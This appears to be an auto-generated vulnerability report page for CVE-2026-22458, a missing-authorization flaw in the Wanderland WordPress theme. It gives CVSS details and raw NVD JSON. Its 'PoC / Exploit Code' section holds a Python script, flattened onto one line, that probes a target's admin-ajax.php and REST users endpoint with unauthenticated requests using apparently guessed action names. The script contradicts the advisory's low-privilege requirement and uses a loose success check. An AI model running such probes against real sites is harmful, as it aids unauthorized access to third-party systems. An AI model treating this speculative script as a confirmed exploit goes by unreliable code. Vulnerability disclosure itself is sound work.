Security Vulnerability Report
中文
CVE-2026-22458 CVSS 4.3 MEDIUM

CVE-2026-22458

Published: 2026-01-22 17:16:35
Last Modified: 2026-04-28 19:36:39

Description

Missing Authorization vulnerability in Mikado-Themes Wanderland wanderland allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Wanderland: from n/a through <= 1.5.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Wanderland <= 1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-22458 PoC - Missing Authorization in Wanderland Theme # Target: WordPress site with Wanderland theme <= 1.5 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2026-22458 Missing Authorization vulnerability in Wanderland theme """ # Common AJAX endpoint in WordPress themes ajax_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/users' ] # Sensitive actions that should require authorization sensitive_actions = [ 'wanderland_save_options', 'wanderland_update_settings', 'wanderland_modify_theme', 'wanderland_get_config' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2026-22458: Missing Authorization in Wanderland Theme") for endpoint in ajax_endpoints: url = target_url.rstrip('/') + endpoint for action in sensitive_actions: try: # Send request without authentication data = { 'action': action, 'nonce': '', # Missing or bypassed nonce } response = requests.post(url, data=data, timeout=10) # Check if response indicates successful unauthorized access if response.status_code == 200: if 'success' in response.text or 'data' in response.text: if 'You do not have permission' not in response.text: print(f"[!] Potential vulnerability found!") print(f"[!] Endpoint: {url}") print(f"[!] Action: {action}") print(f"[!] Response: {response.text[:200]}") return True except Exception as e: print(f"[-] Error testing {url}: {e}") print("[*] No obvious vulnerability detected") print("[*] Manual verification recommended") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-22458.py <target_url>") print("Example: python cve-2026-22458.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22458", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:34.793", "lastModified": "2026-04-28T19:36:38.797", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Mikado-Themes Wanderland wanderland allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Wanderland: from n/a through <= 1.5."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Mikado-Themes Wanderland wanderland permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Wanderland: desde n/a hasta &lt;= 1.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/wanderland/vulnerability/wordpress-wanderland-theme-1-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}